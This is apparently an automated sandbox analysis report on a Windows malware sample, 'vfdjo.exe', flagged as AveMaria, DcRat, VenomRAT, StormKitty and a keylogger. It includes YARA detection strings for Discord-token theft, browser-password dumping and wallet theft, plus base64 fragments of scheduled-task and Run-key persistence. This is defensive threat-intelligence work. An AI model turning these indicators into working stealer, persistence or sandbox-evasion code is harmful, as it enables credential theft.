Edit tour

Windows Analysis Report
vfdjo.exe

Overview

General Information

Sample name:	vfdjo.exe
Analysis ID:	1582971
MD5:	a03f28f2c0bf87d438a28e815d4b458a
SHA1:	60627893ce5e918c9b3dbe146f1b577f630129b5
SHA256:	1c9f4869c446e6e1e3c562631b1a10210294a7dd1367b4a58450b1a949e873e9
Tags:	147-45-44-131bookingexeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected AveMaria stealer

Yara detected BrowserPasswordDump

Yara detected DcRat

Yara detected Keylogger Generic

Yara detected Powershell download and execute

Yara detected StormKitty Stealer

Yara detected VenomRAT

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

Compiles code for process injection (via .Net compiler)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Dot net compiler compiles file from suspicious location

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

vfdjo.exe (PID: 7508 cmdline: "C:\Users\user\Desktop\vfdjo.exe" MD5: A03F28F2C0BF87D438A28E815D4B458A)

csc.exe (PID: 7532 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvbdqmie\lvbdqmie.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 7540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 7580 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD93C.tmp" "c:\Users\user\AppData\Local\Temp\lvbdqmie\CSC98E74741E11B4215AF424C82513491D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 7660 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Ave Maria, AveMariaRAT, avemaria	Information stealer which uses AutoIT for wrapping.	Anunak	http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery https://asec.ahnlab.com/en/36629/ https://blog.cyber5w.com/analyzing-macro-enabled-office-documents https://blog.morphisec.com/syk-crypter-discord https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, 404KeyLogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x27510f:$a1: havecamera 0x2c7209:$a2: timeout 3 > NUL 0x2caae2:$a3: START "" " 0x2cb03d:$a3: START "" " 0x2caed2:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x2cafb5:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
dump.pcap	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x2cf31b:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
dump.pcap	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2c69a1:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x2c2533:$s6: VirtualBox 0x2d388c:$s6: VirtualBox 0x2cebe9:$s8: Win32_ComputerSystem 0x2d37f2:$s8: Win32_ComputerSystem 0x2cb975:$s9: Win32_Process Where ParentProcessID= 0x2cb500:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x2cb59d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x2cb6b2:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.1721135012.00000000010F6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.4148154004.000000000304D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DcRat_2	Yara detected DcRat	Joe Security
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x2319d8:$a1: havecamera 0x27c802:$a2: timeout 3 > NUL 0x27fb85:$a3: START "" " 0x28009a:$a3: START "" " 0x27ff75:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x280012:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x283dd6:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1721644050.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x27c072:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x2781e6:$s6: VirtualBox 0x287d65:$s6: VirtualBox 0x283782:$s8: Win32_ComputerSystem 0x287ccb:$s8: Win32_ComputerSystem 0x2808ae:$s9: Win32_Process Where ParentProcessID= 0x2804cb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x280568:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28067d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x280765:$cnc4: POST / HTTP/1.1
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x241208:$a1: havecamera 0x28c032:$a2: timeout 3 > NUL 0x28f3b5:$a3: START "" " 0x28f8ca:$a3: START "" " 0x28f7a5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x28f842:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293606:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000004.00000002.4144573096.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28b8a2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x287a16:$s6: VirtualBox 0x297595:$s6: VirtualBox 0x292fb2:$s8: Win32_ComputerSystem 0x2974fb:$s8: Win32_ComputerSystem 0x2900de:$s9: Win32_Process Where ParentProcessID= 0x28fcfb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x28fd98:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x28fead:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x28ff95:$cnc4: POST / HTTP/1.1
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x2419f8:$a1: havecamera 0x53f418:$a1: havecamera 0x28c822:$a2: timeout 3 > NUL 0x58a242:$a2: timeout 3 > NUL 0x28fba5:$a3: START "" " 0x2900ba:$a3: START "" " 0x58d5c5:$a3: START "" " 0x58dada:$a3: START "" " 0x28ff95:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x58d9b5:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x290032:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x58da52:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x293df6:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x591816:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000000.00000002.1721644050.0000000003FD9000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x28c092:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x589ab2:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x288206:$s6: VirtualBox 0x297d85:$s6: VirtualBox 0x585c26:$s6: VirtualBox 0x5957a5:$s6: VirtualBox 0x2937a2:$s8: Win32_ComputerSystem 0x297ceb:$s8: Win32_ComputerSystem 0x5911c2:$s8: Win32_ComputerSystem 0x59570b:$s8: Win32_ComputerSystem 0x2908ce:$s9: Win32_Process Where ParentProcessID= 0x58e2ee:$s9: Win32_Process Where ParentProcessID= 0x2904eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x58df0b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x290588:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x58dfa8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x29069d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x58e0bd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x290785:$cnc4: POST / HTTP/1.1 0x58e1a5:$cnc4: POST / HTTP/1.1
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: vfdjo.exe PID: 7508	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xc0eb8:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84} 0x228bf9:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: vfdjo.exe PID: 7508	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x64c6c:$s6: VirtualBox 0x1cc9ad:$s6: VirtualBox 0xc0b8e:$s8: Win32_ComputerSystem 0xc2dab:$s8: Win32_ComputerSystem 0x2288cf:$s8: Win32_ComputerSystem 0x22aaec:$s8: Win32_ComputerSystem 0xbf4e4:$s9: Win32_Process Where ParentProcessID= 0x227225:$s9: Win32_Process Where ParentProcessID= 0xbf2f7:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x227038:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xbf345:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x227086:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xbf3cf:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x227110:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xbf443:$cnc4: POST / HTTP/1.1 0x227184:$cnc4: POST / HTTP/1.1
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7660	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x11f1ab:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: RegAsm.exe PID: 7660	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0xc2f5f:$s6: VirtualBox 0x9813:$s8: Win32_ComputerSystem 0x98df:$s8: Win32_ComputerSystem 0xa7f7:$s8: Win32_ComputerSystem 0xc14c:$s8: Win32_ComputerSystem 0xc1a5:$s8: Win32_ComputerSystem 0xc995:$s8: Win32_ComputerSystem 0xf733:$s8: Win32_ComputerSystem 0xf7af:$s8: Win32_ComputerSystem 0xf8d7:$s8: Win32_ComputerSystem 0xfade:$s8: Win32_ComputerSystem 0x109b6:$s8: Win32_ComputerSystem 0x2780d:$s8: Win32_ComputerSystem 0x2796d:$s8: Win32_ComputerSystem 0x3e54a:$s8: Win32_ComputerSystem 0x3e628:$s8: Win32_ComputerSystem 0x557a7:$s8: Win32_ComputerSystem 0x57a97:$s8: Win32_ComputerSystem 0x57b67:$s8: Win32_ComputerSystem 0x5c153:$s8: Win32_ComputerSystem 0x5c229:$s8: Win32_ComputerSystem
Click to see the 40 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.vfdjo.exe.2c994c2.3.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x3616:$x2: https://github.com/LimerBoy/StormKitty 0x3632:$x3: StormKitty
0.2.vfdjo.exe.2c9c510.2.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty
0.2.vfdjo.exe.2c2a79e.1.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x302e:$x2: https://github.com/LimerBoy/StormKitty 0x304a:$x3: StormKitty
0.2.vfdjo.exe.2c2d204.0.raw.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty
0.2.vfdjo.exe.2c994c2.3.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x1816:$x2: https://github.com/LimerBoy/StormKitty 0x1832:$x3: StormKitty
0.2.vfdjo.exe.2c2d204.0.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x6dad4:$x2: https://github.com/LimerBoy/StormKitty 0x6daf0:$x3: StormKitty
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	JoeSecurity_Keylogger_Generic_3	Yara detected Keylogger Generic	Joe Security
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x11d69e:$a1: havecamera 0x1684c8:$a2: timeout 3 > NUL 0x16b84b:$a3: START "" " 0x16bd60:$a3: START "" " 0x16bc3b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x16bcd8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	infostealer_win_stealerium	Detects Stealerium based on specific strings	Sekoia.io	0x16ebc2:$str01: Processe: 0x16ea7e:$str02: Compname: 0x16eb78:$str04: SandBoxie: 0x16eb0e:$str08: WEBCAMS COUNT: 0x16eb32:$str09: [Virtualization] 0x16f380:$str10: [Open google maps]( 0x170df7:$str11: Remember password: 0x163eea:$str12: Target.Browsers.Firefox 0x14b665:$str13: Modules.Keylogger 0x153528:$str14: ClipperAddresses 0x1556cd:$str15: ChromiumPswPaths 0x1556df:$str15: ChromiumPswPaths 0x151622:$str16: DetectedBankingServices 0x15178b:$str17: DetectCryptocurrencyServices 0x15f684:$str18: CheckRemoteDebuggerPresent 0x160609:$str19: GetConnectedCamerasCount
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	infostealer_win_stormkitty	Finds StormKitty samples (or their variants) based on specific strings	Sekoia.io	0x12ebe8:$str01: set_sUsername 0x13c11a:$str03: set_sExpMonth 0x1514d5:$str04: WritePasswords 0x151f8f:$str05: WriteCookies 0x1556de:$str06: sChromiumPswPaths 0x1556b9:$str07: sGeckoBrowserPaths 0x16ad65:$str10: encrypted_key":"(.*?)"
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	rat_win_dcrat_qwqdanchun	Find DcRAT samples (qwqdanchun) based on specific strings	Sekoia.io	0x16bcd8:$str02: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA== 0x167da8:$str04: Pac_ket 0x177ac6:$str05: Perfor_mance 0x177b0a:$str06: Install_ed 0x12219b:$str07: get_IsConnected 0x138660:$str08: get_ActivatePo_ng 0x14c59b:$str09: isVM_by_wim_temper 0x1783b8:$str10: save_Plugin 0x1684c8:$str11: timeout 3 > NUL 0x1776a6:$str12: ProcessHacker.exe 0x177898:$str13: Select * from Win32_CacheMemory
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x16bcd8:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x16bc3b:$s2: L2Mgc2NodGFza3MgL2
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x177898:$q1: Select * from Win32_CacheMemory 0x1778d8:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x177926:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x177974:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x16fa9c:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
0.2.vfdjo.exe.3d0d33a.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x175437:$s1: \VPN\NordVPN 0x17541d:$s2: \VPN\OpenVPN 0x1753ff:$s3: \VPN\ProtonVPN
